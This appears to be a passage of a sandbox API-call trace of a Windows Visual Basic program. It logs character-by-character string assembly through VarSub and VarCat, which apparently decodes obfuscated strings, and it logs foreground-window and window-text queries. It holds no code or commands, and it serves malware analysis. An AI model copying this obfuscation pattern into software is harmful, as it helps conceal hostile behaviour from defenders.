dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.722] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0178.722] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.722] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0178.723] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.723] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0178.723] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.724] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.725] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.725] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.725] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.726] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.726] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.727] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.727] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.728] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.728] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.728] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.729] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.734] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.734] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.734] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.735] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.735] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.736] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.736] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.736] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.737] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.737] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.738] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.738] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.739] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.739] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.740] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.740] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.740] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.741] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.741] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.742] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.742] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.742] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.743] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.743] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.744] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.744] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.745] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.757] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.757] GetForegroundWindow () returned 0x20086 [0178.758] GetLastError () returned 0x0 [0178.758] SysStringLen (param_1=" ") returned 0xff [0178.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.758] SysStringLen (param_1=" ") returned 0xff [0178.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.758] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0178.758] GetLastError () returned 0x0 [0178.759] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.759] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0178.759] SysStringLen (param_1="Pro") returned 0x3 [0178.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x116859c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0178.760] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0178.760] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0178.760] GetFocus () returned 0x0 [0178.760] lstrlenA (lpString="Pro") returned 3 [0178.760] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0178.760] IsWindow (hWnd=0x103c4) returned 1 [0178.766] IsWindow (hWnd=0x103c4) returned 1 [0178.766] IsWindow (hWnd=0x103c4) returned 1 [0178.766] IsWindow (hWnd=0x103c4) returned 1 [0178.766] GetFocus () returned 0x0 [0178.767] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0178.767] GetFocus () returned 0x0 [0178.767] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0178.767] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0178.767] GetFocus () returned 0x0 [0178.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0178.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0178.767] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.768] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.769] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.769] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.769] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.769] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.770] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.770] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.770] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.771] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.771] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.771] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.772] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.772] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.772] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.773] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.773] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.773] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.774] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: 